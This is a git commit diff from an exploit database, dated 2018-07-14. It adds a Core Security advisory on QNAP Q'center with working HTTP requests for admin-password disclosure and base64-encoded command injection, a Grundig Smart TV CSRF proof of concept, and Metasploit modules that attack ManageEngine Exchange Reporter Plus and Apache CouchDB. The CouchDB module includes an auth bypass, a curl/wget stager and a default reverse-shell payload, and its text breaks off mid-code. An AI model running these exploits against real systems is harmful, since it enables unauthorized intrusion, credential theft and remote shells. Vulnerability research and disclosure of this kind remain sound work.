DB: 2018-07-14
10 changes to exploits/shellcodes G DATA Total Security 25.4.0.3 - Activex Buffer Overflow Microsoft Windows - POP/MOV SS Local Privilege Elevation (Metasploit) HID discoveryd - 'command_blink_on' Unauthenticated Remote Code Execution (Metasploit) HID discoveryd - 'command_blink_on' Remote Code Execution (Metasploit) IBM QRadar SIEM - Unauthenticated Remote Code Execution (Metasploit) IBM QRadar SIEM - Remote Code Execution (Metasploit) Manage Engine Exchange Reporter Plus - Remote Code Execution (Metasploit) Apache CouchDB - Arbitrary Command Execution (Metasploit) phpMyAdmin - (Authenticated) Remote Code Execution (Metasploit) Hadoop YARN ResourceManager - Unauthenticated Command Execution (Metasploit) Dolibarr 3.2.0 < Alpha - File Inclusion Dolibarr ERP/CRM 3.2.0 < Alpha - File Inclusion Dolibarr ERP/CRM - OS Command Injection Dolibarr ERP/CRM < 3.2.0 / < 3.1.1 - OS Command Injection Dolibarr ERP/CMS 3.4.0 - 'exportcsv.php?sondage' SQL Injection Dolibarr ERP/CRM 3.4.0 - 'exportcsv.php?sondage' SQL Injection Dolibarr CMS 3.5.3 - Multiple Vulnerabilities Dolibarr ERP/CRM 3.5.3 - Multiple Vulnerabilities Dolibarr CMS 3.0 - Local File Inclusion / Cross-Site Scripting Dolibarr ERP/CRM 3.0 - Local File Inclusion / Cross-Site Scripting Dolibarr ERP/CRM - '/user/index.php' Multiple SQL Injections Dolibarr ERP/CRM - '/user/info.php?id' SQL Injection Dolibarr ERP/CRM - '/admin/boxes.php?rowid' SQL Injection Dolibarr ERP/CRM 3.1.0 - '/user/index.php' Multiple SQL Injections Dolibarr ERP/CRM 3.1.0 - '/user/info.php?id' SQL Injection Dolibarr ERP/CRM 3.1.0 - '/admin/boxes.php?rowid' SQL Injection Dolibarr CMS 3.x - '/adherents/fiche.php' SQL Injection Dolibarr ERP/CRM 3.x - '/adherents/fiche.php' SQL Injection Dolibarr CMS 3.2 Alpha - Multiple Directory Traversal Vulnerabilities Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities Dolibarr 7.0.0 - SQL Injection Dolibarr ERP/CRM 7.0.0 - (Authenticated) SQL Injection Dolibarr ERP CRM < 7.0.3 - PHP Code Injection Dolibarr ERP/CRM < 7.0.3 - PHP Code Injection ManageEngine Exchange Reporter Plus < Build 5311 - Remote Code Execution WAGO e!DISPLAY 7300T - Multiple Vulnerabilities QNAP Qcenter Virtual Appliance - Multiple Vulnerabilities Zeta Producer Desktop CMS 14.2.0 - Remote Code Execution / Local File Disclosure Grundig Smart Inter@ctive 3.0 - Cross-Site Request Forgery
This commit is contained in:
parent
e76244b41a
commit
b374aca9a3
11 changed files with 1915 additions and 15 deletions
398
exploits/hardware/webapps/45015.txt
Normal file
398
exploits/hardware/webapps/45015.txt
Normal file
|
@ -0,0 +1,398 @@
|
|||
Core Security - Corelabs Advisory
|
||||
http://corelabs.coresecurity.com/
|
||||
|
||||
QNAP Qcenter Virtual Appliance Multiple Vulnerabilities
|
||||
|
||||
1. *Advisory Information*
|
||||
|
||||
Title: QNAP Qcenter Virtual Appliance Multiple Vulnerabilities
|
||||
Advisory ID: CORE-2018-0006
|
||||
Advisory URL:
|
||||
http://www.coresecurity.com/advisories/qnap-qcenter-multiple-vulnerabilities
|
||||
Date published: 2018-07-11
|
||||
Date of last update: 2018-07-11
|
||||
Vendors contacted: QNAP
|
||||
Release mode: Coordinated release
|
||||
|
||||
2. *Vulnerability Information*
|
||||
|
||||
Class: Information Exposure [CWE-200], Command Injection [CWE-77],
|
||||
Command Injection [CWE-77], Command Injection [CWE-77],
|
||||
Command Injection [CWE-77]
|
||||
Impact: Code execution
|
||||
Remotely Exploitable: Yes
|
||||
Locally Exploitable: Yes
|
||||
CVE Name: CVE-2018-0706, CVE-2018-0707, CVE-2018-0708, CVE-2018-0709,
|
||||
CVE-2018-0710
|
||||
|
||||
3. *Vulnerability Description*
|
||||
|
||||
QNAP's website states that:
|
||||
|
||||
[1] Q'center Virtual Appliance is a central management platform that
|
||||
enables you to consolidate the management of multiple QNAP NAS. The
|
||||
Q'center web interface gives you the ease-of-use, cost-efficiency,
|
||||
convenience and flexibility to manage multiple NAS, across multiple
|
||||
sites, from any internet browser.
|
||||
|
||||
The platform's provides centralized web-based administration to manage
|
||||
the following features:
|
||||
|
||||
- Review HDD S.M.A.R.T. values
|
||||
- Monitor system status
|
||||
- Manage apps and shared folders
|
||||
- Review infographice reports
|
||||
|
||||
Multiple vulnerabilities were found in the Q'center Virtual Appliance
|
||||
web console that would allow an attacker to execute arbitrary commands
|
||||
on the system.
|
||||
|
||||
4. *Vulnerable versions*
|
||||
|
||||
. Q'center Virtual Appliance Version 1.6.1056 (20170825)
|
||||
. Q'center Virtual Appliance Version 1.6.1075 (20171123)
|
||||
Other products and versions might be affected, but they were not tested.
|
||||
|
||||
5. *Vendor Information, Solutions and Workarounds*
|
||||
|
||||
QNAP published the following Security Note:
|
||||
|
||||
. https://www.qnap.com/en-us/security-advisory/nas-201807-10
|
||||
|
||||
6. *Credits*
|
||||
|
||||
These vulnerabilities were discovered and researched by Ivan Huertas
|
||||
from Core Security Consulting Services. The publication of this advisory
|
||||
was coordinated by Leandro Cuozzo from Core Advisories Team.
|
||||
|
||||
7. *Technical Description / Proof of Concept Code*
|
||||
|
||||
QNAP's Q'center Virtual Appliance web console includes a functionality
|
||||
that would allow an authenticated attacker to elevate privileges on the
|
||||
system. We describe this issue in section 7.1.
|
||||
|
||||
Sections 7.2, 7.3, 7.4 and 7.5 show different methods to gain command
|
||||
execution.
|
||||
|
||||
7.1. *Privilege escalation*
|
||||
|
||||
[CVE-2018-0706]
|
||||
The application contains an API endpoint that returns information about
|
||||
the accounts defined in the database. The information returned is
|
||||
informative for all the users except for the admin user, which cames
|
||||
with every installation, where an extra field is presented. This extra
|
||||
field (new_password) contains the password defined at installation time
|
||||
for the admin user encoded in base64.
|
||||
|
||||
Any authenticated user could access this API endpoint and retrieve the
|
||||
admin user's password, therefore being able to login as an administrator.
|
||||
|
||||
The following proof of concept shows a user with viewer access
|
||||
retrieving the admin's password encoded in base64 in the new_password
|
||||
field.
|
||||
|
||||
/-----
|
||||
GET /qcenter/hawkeye/v1/account?_dc=1519932315271 HTTP/1.1
|
||||
Host: 192.168.1.178
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
|
||||
Firefox/45.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Referer: https://192.168.1.178/qcenter/
|
||||
Cookie: CMS_lang=ENG; AUTHENTICATION=0; TIMEZONE_CODE=17;
|
||||
DST_ENABLE=False; user=viewer; CMS_SID=IV4P74Y16X; ROLE=1082130432;
|
||||
_ID=5a9847223af7e2034924e7b6; LOGIN_TIME=1519932215818; remember=false
|
||||
Connection: close
|
||||
|
||||
HTTP/1.1 200 OK
|
||||
Date: Thu, 01 Mar 2018 19:23:43 GMT
|
||||
Server: Apache
|
||||
X-Frame-Options: SAMEORIGIN
|
||||
X-XSS-Protection: 1; mode=block
|
||||
X-Content-Type-Options: nosniff
|
||||
Content-Type: application/json
|
||||
Content-Length: 878
|
||||
Connection: close
|
||||
|
||||
{
|
||||
"total_count": 2,
|
||||
"account": [
|
||||
{
|
||||
"dst_enable": false,
|
||||
"name": "admin",
|
||||
"default": true,
|
||||
"new_password": "YWRtaW5pc3RyYWRvcg==",
|
||||
"authentication": 0,
|
||||
"create_time": {
|
||||
"$date": 1519917983616
|
||||
},
|
||||
"role": 4294967295,
|
||||
"timezone_code": 17,
|
||||
"last_login": {
|
||||
"$date": 1519929869797
|
||||
},
|
||||
"_id": "5a981b9f3af7e2030c883592",
|
||||
"email": "",
|
||||
"description": "administrator"
|
||||
},
|
||||
{
|
||||
"dst_enable": false,
|
||||
"name": "viewer",
|
||||
"register_code": "",
|
||||
"authentication": 0,
|
||||
"create_time": {
|
||||
"$date": 1519929122332
|
||||
},
|
||||
"role": 1082130432,
|
||||
"timezone_code": 17,
|
||||
"last_login": {
|
||||
"$date": 1519932215818
|
||||
},
|
||||
"_id": "5a9847223af7e2034924e7b6",
|
||||
"email": "",
|
||||
"description": ""
|
||||
}
|
||||
]
|
||||
}
|
||||
-----/
|
||||
|
||||
As can be seen in the following excerpt, the decoded base64 data
|
||||
corresponds to the plaintext administrator password set at installation
|
||||
time.
|
||||
|
||||
/-----
|
||||
$ echo YWRtaW5pc3RyYWRvcg== | base64 -d
|
||||
administrador
|
||||
-----/
|
||||
|
||||
7.2. *Command Execution in change password for the admin user*
|
||||
|
||||
[CVE-2018-0707]
|
||||
When the admin user performs a password change, the application executes
|
||||
an OS command to impact the changes. The input is not properly sanitized
|
||||
when passed down to the OS, allowing an attacker to run arbitrary
|
||||
commands.
|
||||
|
||||
/-----
|
||||
POST /qcenter/hawkeye/v1/account?change_passwd HTTP/1.1
|
||||
Host: 192.168.1.209
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
|
||||
Firefox/45.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/json
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Referer: https://192.168.1.209/qcenter/
|
||||
Content-Length: 118
|
||||
Cookie: CMS_lang=ENG; user=admin; CMS_SID=TWYH7A55X5; ROLE=4294967295;
|
||||
_ID=5a8465ba3af7e2030984c84e; LOGIN_TIME=1518714672547;
|
||||
AUTHENTICATION=0; TIMEZONE_CODE=17; DST_ENABLE=False; remember=false
|
||||
Connection: close
|
||||
|
||||
{"_id":"5a8465ba3af7e2030984c84e","old_password":"dGlzMzhhZWw=","new_password":"Ijt0b3VjaCAvdG1wL2NoYW5nZXBhc3M7Ig=="}
|
||||
-----/
|
||||
|
||||
The API requires to send the password encoded in base64. This makes a
|
||||
lot easier to inject command as we do not need to bypass any filters.
|
||||
For the admin user in the web application, there is also a backing user
|
||||
present on the OS. When a password change is requested for this user,
|
||||
the values submitted to the API are included in a "sudo passwd" command,
|
||||
where the injection occurs.
|
||||
|
||||
In this particular case, the old_password must match the current
|
||||
password, which can be obtained by exploiting [CVE-2018-0706].
|
||||
|
||||
7.3. *Command Execution in network config update*
|
||||
|
||||
[CVE-2018-0708]
|
||||
The admin user created at installation time can modify the network
|
||||
configuration. In order to do this, the admin has to access the settings
|
||||
section which is protected by the OS password (which could be obtained
|
||||
using the Privilege Escalation vulnerability described above). However,
|
||||
we identified that a user with the Power User profile could also execute
|
||||
this function, despite access not being provided through the web
|
||||
application interface. This function requires to send the admin user
|
||||
password encoded in base64 in the passwd field. This value is then used
|
||||
to perform a sudo operation in the OS to change the network settings. We
|
||||
used the passwd field to inject command
|
||||
(";touch /tmp/netconfigpower; echo "a) and create a file in /tmp/.
|
||||
|
||||
/-----
|
||||
POST /qcenter/hawkeye/v1/network_config HTTP/1.1
|
||||
Host: 192.168.1.178
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
|
||||
Firefox/45.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/json
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Referer: https://192.168.1.178/qcenter/
|
||||
Content-Length: 87
|
||||
Cookie: CMS_lang=ENG; AUTHENTICATION=0; TIMEZONE_CODE=17;
|
||||
DST_ENABLE=False; user=power; CMS_SID=MFVG0R9SMK; ROLE=1610612735;
|
||||
_ID=5a9858ad3af7e2034924e7cc; LOGIN_TIME=1519934345000; remember=false
|
||||
Connection: close
|
||||
|
||||
{"type":"0","dns_type":"0","passwd":"Ijt0b3VjaCAvdG1wL25ldGNvbmZpZ3Bvd2VyOyBlY2hvICJh"}
|
||||
-----/
|
||||
|
||||
The passwd parameter is used in bash echo command unsanitized.
|
||||
|
||||
7.4. *Command Execution in date config update*
|
||||
|
||||
[CVE-2018-0709]
|
||||
The admin user created at installation time is capable of modifying the
|
||||
date configuration. In order to do this, the admin has to access the
|
||||
settings section which is protected by the OS password (which could be
|
||||
obtained using the Privilege Escalation vulnerability described above).
|
||||
However, we identified that a user with the Power User profile could
|
||||
execute this function, despite the access is not provided through the
|
||||
web application interface. This function requires to submit the admin
|
||||
user password encoded in base64 in the passwd field. This value is then
|
||||
used to perform a sudo operation in the OS to change the date
|
||||
configuration settings. We used the passwd field to inject command
|
||||
(";touch /tmp/date_config;echo"lalala) and create a file in /tmp/.
|
||||
|
||||
/-----
|
||||
POST /qcenter/hawkeye/v1/date_config HTTP/1.1
|
||||
Host: 192.168.1.178
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
|
||||
Firefox/45.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/json
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Referer: https://192.168.1.178/qcenter/
|
||||
Content-Length: 153
|
||||
Cookie: CMS_lang=ENG; AUTHENTICATION=0; TIMEZONE_CODE=17;
|
||||
DST_ENABLE=False; user=power; CMS_SID=MFVG0R9SMK; ROLE=1610612735;
|
||||
_ID=5a9858ad3af7e2034924e7cc; LOGIN_TIME=1519934345000; remember=false
|
||||
Connection: close
|
||||
|
||||
{"listValue":18,"type":"1","datefield":1518663600000,"passwd":"Ijt0b3VjaCAvdG1wL2RhdGVfY29uZmlnO2VjaG8ibGFsYWxh","date":"20180215","time":"16:40:31"}
|
||||
-----/
|
||||
|
||||
The passwd parameter is used in bash echo command unsanitized.
|
||||
|
||||
7.5. *Command Execution in SSH settings config update*
|
||||
[CVE-2018-0710]
|
||||
The admin user created at installation time is capable of modifying the
|
||||
SSH configuration. In order to do this, the admin has to access the
|
||||
settings section which is protected by the OS password (which could be
|
||||
obtained using the Privilege Escalation vulnerability). However, we
|
||||
identified that a user with the Power User profile could execute this
|
||||
function, despite the access is not provided through the web application
|
||||
interface. This function requires to submit the admin user password
|
||||
encoded in base64 in the passwd field. This value is then used to
|
||||
perform a sudo operation in the OS to change the date configuration
|
||||
settings. We used the passwd field to inject command
|
||||
("";touch /tmp/ssh; echo "lalalala) and create a file in /tmp/.
|
||||
|
||||
/-----
|
||||
POST /qcenter/hawkeye/v1/ssh_setting_config HTTP/1.1
|
||||
Host: 192.168.1.178
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
|
||||
Firefox/45.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/json
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Referer: https://192.168.1.178/qcenter/
|
||||
Content-Length: 82
|
||||
Cookie: CMS_lang=ENG; AUTHENTICATION=0; TIMEZONE_CODE=17;
|
||||
DST_ENABLE=False; user=power; CMS_SID=MFVG0R9SMK; ROLE=1610612735;
|
||||
_ID=5a9858ad3af7e2034924e7cc; LOGIN_TIME=1519934345000; remember=false
|
||||
Connection: close
|
||||
|
||||
{"ssh_enable":1,"port":22,"passwd":"Ijt0b3VjaCAvdG1wL3NzaDsgZWNobyAibGFsYWxhbGE="}
|
||||
-----/
|
||||
|
||||
The passwd parameter is used in bash echo command unsanitized.
|
||||
|
||||
8. *Report Timeline*
|
||||
2018-03-13: Core Security sent an initial notification to QNAP,
|
||||
including a draft advisory.
|
||||
2018-03-14: QNAP replied that they received the draft version of the
|
||||
advisory and that they would review it.
|
||||
2018-03-23: Core Security requested a status update.
|
||||
2018-04-10: Core Security requested a confirmation about the reported
|
||||
vulnerabilities and a tentative timescale to fix them.
|
||||
2018-04-12: QNAP answered saying that they were unable to reproduce the
|
||||
reported vulnerabilities and asked for more detailed information to
|
||||
reproduce them.
|
||||
2018-04-13: Core Security sent a more detailed guide to test.
|
||||
2018-04-16: QNAP confirmed reception.
|
||||
2018-04-26: Core Security requested a status update.
|
||||
2018-04-29: QNAP confirmed the reported vulnerabilities and informed
|
||||
that their software team were working in a fixed version.
|
||||
2018-05-21: Core Security requested a status update.
|
||||
2018-05-28: QNAP informed that a new version of Q'center would be
|
||||
release by the week of June 4.
|
||||
2018-05-28: Core Security thanked for the update and proposed June 13th
|
||||
as publication date.
|
||||
2018-05-29: QNAP answered saying that the new Q'center release was
|
||||
delayed and asked to postpone the publication a week later.
|
||||
2018-05-29: Core Security asked for a solidified release date in order
|
||||
to go public at the same time.
|
||||
2018-06-04: QNAP informed that they didn't have a confirmed date yet.
|
||||
2018-06-08: Core Security asked QNAP for a status update.
|
||||
2018-06-12: QNAP notified that Q'center was under testing, for that
|
||||
reason they didn't have a confirmed release date.
|
||||
2018-06-25: Core Security asked again for a status update.
|
||||
2018-06-27: QNAP replied that they were expecting to release their
|
||||
security advisory next week Thursday or Friday.
|
||||
2018-06-28: Core Security informed QNAP that recommend vendors not to
|
||||
publish near the weekend and proposed Wednesday July 11th as the
|
||||
publication date.
|
||||
2018-07-02: Core Security asked for a confirmation about the proposed
|
||||
date.
|
||||
2018-06-27: QNAP confirmed July 11th as the publication date.
|
||||
2018-07-11: Advisory CORE-2018-0006 published.
|
||||
|
||||
9. *References*
|
||||
|
||||
[1] https://www.qnap.com/solution/qcenter/index.php
|
||||
|
||||
10. *About CoreLabs*
|
||||
|
||||
CoreLabs, the research center of Core Security, is charged with
|
||||
anticipating the future needs and requirements for information security
|
||||
technologies.
|
||||
We conduct our research in several important areas of computer security
|
||||
including system vulnerabilities, cyber attack planning and simulation,
|
||||
source code auditing, and cryptography. Our results include problem
|
||||
formalization, identification of vulnerabilities, novel solutions and
|
||||
prototypes for new technologies. CoreLabs regularly publishes security
|
||||
advisories, technical papers, project information and shared software
|
||||
tools for public use at:
|
||||
http://corelabs.coresecurity.com.
|
||||
|
||||
11. *About Core Security*
|
||||
|
||||
Core Security provides companies with the security insight they need to
|
||||
know who, how, and what is vulnerable in their organization. The
|
||||
company's threat-aware, identity & access, network security, and
|
||||
vulnerability management solutions provide actionable insight and
|
||||
context needed to manage security risks across the enterprise. This
|
||||
shared insight gives customers a comprehensive view of their security
|
||||
posture to make better security remediation decisions. Better insight
|
||||
allows organizations to prioritize their efforts to protect critical
|
||||
assets, take action sooner to mitigate access risk, and react faster if
|
||||
a breach does occur.
|
||||
|
||||
Core Security is headquartered in the USA with offices and operations in
|
||||
South America, Europe, Middle East and Asia. To learn more, contact Core
|
||||
Security at (678) 304-4500 or info@coresecurity.com
|
||||
|
||||
12. *Disclaimer*
|
||||
|
||||
The contents of this advisory are copyright (c) 2018 Core Security and
|
||||
(c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution
|
||||
Non-Commercial Share-Alike 3.0 (United States) License:
|
||||
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
|
34
exploits/hardware/webapps/45022.txt
Normal file
34
exploits/hardware/webapps/45022.txt
Normal file
|
@ -0,0 +1,34 @@
|
|||
# Exploit Title: Grundig Smart Inter@ctive 3.0 - Cross-Site Request Forgery
|
||||
# Date: 2018-07-§3
|
||||
# Exploit Author: Ahmethan-Gultekin - t4rkd3vilz
|
||||
# Vendor Homepage: https://www.grundig.com/
|
||||
# Software Link: https://play.google.com/store/apps/details?id=arcelik
|
||||
# Version: Before > Smart Inter@ctive 3.0
|
||||
# Tested on: Kali Linux
|
||||
# CVE : CVE-2018-13989
|
||||
|
||||
# I'm trying my TV.I saw a Grundig remote control application on
|
||||
# Google Play. Computer I downloaded and decompiled APK.
|
||||
# And I began to examine individual classes. I noticed in a class
|
||||
# that a request was sent during operations on the command line.
|
||||
# I downloaded the phone packet viewer and opened the control application and
|
||||
# made some operations. And I saw that there was such a request;
|
||||
|
||||
# PoC
|
||||
|
||||
request ->
|
||||
GET /sendrcpackage?keyid=-2544&keysymbol=-4081 HTTP/1.1
|
||||
Host: 192.168.1.106:8085
|
||||
Connection : Keep-Alive
|
||||
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
|
||||
|
||||
|
||||
response ->
|
||||
HTTP/1.1 200 OK
|
||||
Content-Type : text/plain
|
||||
|
||||
# Set rc key is handled for key id : -2544 key symbol : -4081
|
||||
# The only requirement for the connection between the TV and the application
|
||||
# was to have the same IP address. After I made the IP address on the TV
|
||||
# and the phone and the IP address on the computer the same:
|
||||
# I accessed the interface from the 8085 port. Now I could do anything from the computer :)
|
91
exploits/java/remote/45018.rb
Executable file
91
exploits/java/remote/45018.rb
Executable file
|
@ -0,0 +1,91 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Manage Engine Exchange Reporter Plus Unauthenticated RCE',
|
||||
'Description' => %q{
|
||||
This module exploits a remote code execution vulnerability that
|
||||
exists in Exchange Reporter Plus <= 5310, caused by execution of
|
||||
bcp.exe file inside ADSHACluster servlet
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Kacper Szurek <kacperszurek@gmail.com>'
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'https://security.szurek.pl/manage-engine-exchange-reporter-plus-unauthenticated-rce.html']
|
||||
],
|
||||
'Platform' => ['win'],
|
||||
'Arch' => [ARCH_X86, ARCH_X64],
|
||||
'Targets' => [['Automatic', {}]],
|
||||
'DisclosureDate' => 'Jun 28 2018',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI', [ true, 'The URI of the application', '/']),
|
||||
Opt::RPORT(8181),
|
||||
])
|
||||
|
||||
end
|
||||
|
||||
def bin_to_hex(s)
|
||||
s.each_byte.map { |b| b.to_s(16).rjust(2,'0') }.join
|
||||
end
|
||||
|
||||
def check
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'exchange', 'servlet', 'GetProductVersion')
|
||||
})
|
||||
|
||||
unless res
|
||||
vprint_error 'Connection failed'
|
||||
return CheckCode::Safe
|
||||
end
|
||||
|
||||
unless res.code == 200
|
||||
vprint_status 'Target is not Manage Engine Exchange Reporter Plus'
|
||||
return CheckCode::Safe
|
||||
end
|
||||
|
||||
begin
|
||||
json = res.get_json_document
|
||||
raise if json.empty? || !json['BUILD_NUMBER']
|
||||
rescue
|
||||
vprint_status 'Target is not Manage Engine Exchange Reporter Plus'
|
||||
return CheckCode::Safe
|
||||
end
|
||||
|
||||
vprint_status "Version: #{json['BUILD_NUMBER']}"
|
||||
|
||||
if json['BUILD_NUMBER'].to_i <= 5310
|
||||
return CheckCode::Appears
|
||||
end
|
||||
|
||||
CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'exchange', 'servlet', 'ADSHACluster'),
|
||||
'vars_post' => {
|
||||
'MTCALL' => "nativeClient",
|
||||
'BCP_RLL' => "0102",
|
||||
'BCP_EXE' => bin_to_hex(generate_payload_exe)
|
||||
}
|
||||
})
|
||||
end
|
||||
end
|
317
exploits/linux/remote/45019.rb
Executable file
317
exploits/linux/remote/45019.rb
Executable file
|
@ -0,0 +1,317 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::CmdStager
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Apache CouchDB Arbitrary Command Execution',
|
||||
'Description' => %q{
|
||||
CouchDB administrative users can configure the database server via HTTP(S).
|
||||
Some of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB.
|
||||
This allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as the CouchDB user,
|
||||
including downloading and executing scripts from the public internet.
|
||||
},
|
||||
'Author' => [
|
||||
'Max Justicz', # CVE-2017-12635 Vulnerability discovery
|
||||
'Joan Touzet', # CVE-2017-12636 Vulnerability discovery
|
||||
'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module
|
||||
],
|
||||
'References' => [
|
||||
['CVE', '2017-12636'],
|
||||
['CVE', '2017-12635'],
|
||||
['URL', 'https://justi.cz/security/2017/11/14/couchdb-rce-npm.html'],
|
||||
['URL', 'http://docs.couchdb.org/en/latest/cve/2017-12636.html'],
|
||||
['URL', 'https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E']
|
||||
],
|
||||
'DisclosureDate' => 'Apr 6 2016',
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'linux',
|
||||
'Arch' => [ARCH_X86, ARCH_X64],
|
||||
'Privileged' => false,
|
||||
'DefaultOptions' => {
|
||||
'PAYLOAD' => 'linux/x64/shell_reverse_tcp',
|
||||
'CMDSTAGER::FLAVOR' => 'curl'
|
||||
},
|
||||
'CmdStagerFlavor' => ['curl', 'wget'],
|
||||
'Targets' => [
|
||||
['Automatic', {}],
|
||||
['Apache CouchDB version 1.x', {}],
|
||||
['Apache CouchDB version 2.x', {}]
|
||||
],
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
|
||||
register_options([
|
||||
Opt::RPORT(5984),
|
||||
OptString.new('URIPATH', [false, 'The URI to use for this exploit to download and execute. (default is random)']),
|
||||
OptString.new('HttpUsername', [false, 'The username to login as']),
|
||||
OptString.new('HttpPassword', [false, 'The password to login with'])
|
||||
])
|
||||
|
||||
register_advanced_options([
|
||||
OptInt.new('Attempts', [false, 'The number of attempts to execute the payload.']),
|
||||
OptString.new('WritableDir', [true, 'Writable directory to write temporary payload on disk.', '/tmp'])
|
||||
])
|
||||
end
|
||||
|
||||
def check
|
||||
get_version
|
||||
version = Gem::Version.new(@version)
|
||||
return CheckCode::Unknown if version.version.empty?
|
||||
vprint_status "Found CouchDB version #{version}"
|
||||
|
||||
return CheckCode::Appears if version < Gem::Version.new('1.7.0') || version.between?(Gem::Version.new('2.0.0'), Gem::Version.new('2.1.0'))
|
||||
|
||||
CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
fail_with(Failure::Unknown, "Something went horribly wrong and we couldn't continue to exploit.") unless get_version
|
||||
version = @version
|
||||
|
||||
vprint_good("#{peer} - Authorization bypass successful") if auth_bypass
|
||||
|
||||
print_status("Generating #{datastore['CMDSTAGER::FLAVOR']} command stager")
|
||||
@cmdstager = generate_cmdstager(
|
||||
temp: datastore['WritableDir'],
|
||||
file: File.basename(cmdstager_path)
|
||||
).join(';')
|
||||
|
||||
register_file_for_cleanup(cmdstager_path)
|
||||
|
||||
if !datastore['Attempts'] || datastore['Attempts'] <= 0
|
||||
attempts = 1
|
||||
else
|
||||
attempts = datastore['Attempts']
|
||||
end
|
||||
|
||||
attempts.times do |i|
|
||||
print_status("#{peer} - The #{i + 1} time to exploit")
|
||||
send_payload(version)
|
||||
Rex.sleep(5)
|
||||
# break if we get the shell
|
||||
break if session_created?
|
||||
end
|
||||
end
|
||||
|
||||
# CVE-2017-12635
|
||||
# The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON,
|
||||
# the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization
|
||||
# for the newly created user.
|
||||
def auth_bypass
|
||||
username = datastore['HttpUsername'] || Rex::Text.rand_text_alpha_lower(4..12)
|
||||
password = datastore['HttpPassword'] || Rex::Text.rand_text_alpha_lower(4..12)
|
||||
@auth = basic_auth(username, password)
|
||||
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri.path, "/_users/org.couchdb.user:#{username}"),
|
||||
'method' => 'PUT',
|
||||
'ctype' => 'application/json',
|
||||
'data' => %({"type": "user","name": "#{username}","roles": ["_admin"],"roles": [],"password": "#{password}"})
|
||||
)
|
||||
|
||||
if res && (res.code == 200 || res.code == 201) && res.get_json_document['ok']
|
||||
return true
|
||||
else
|
||||
return false
|
||||
end
|
||||
end
|
||||
|
||||
def get_version
|
||||
@version = nil
|
||||
|
||||
begin
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri.path),
|
||||
'method' => 'GET',
|
||||
'authorization' => @auth
|
||||
)
|
||||
rescue Rex::ConnectionError
|
||||
vprint_bad("#{peer} - Connection failed")
|
||||
return false
|
||||
end
|
||||
|
||||
unless res
|
||||
vprint_bad("#{peer} - No response, check if it is CouchDB. ")
|
||||
return false
|
||||
end
|
||||
|
||||
if res && res.code == 401
|
||||
print_bad("#{peer} - Authentication required.")
|
||||
return false
|
||||
end
|
||||
|
||||
if res && res.code == 200
|
||||
res_json = res.get_json_document
|
||||
|
||||
if res_json.empty?
|
||||
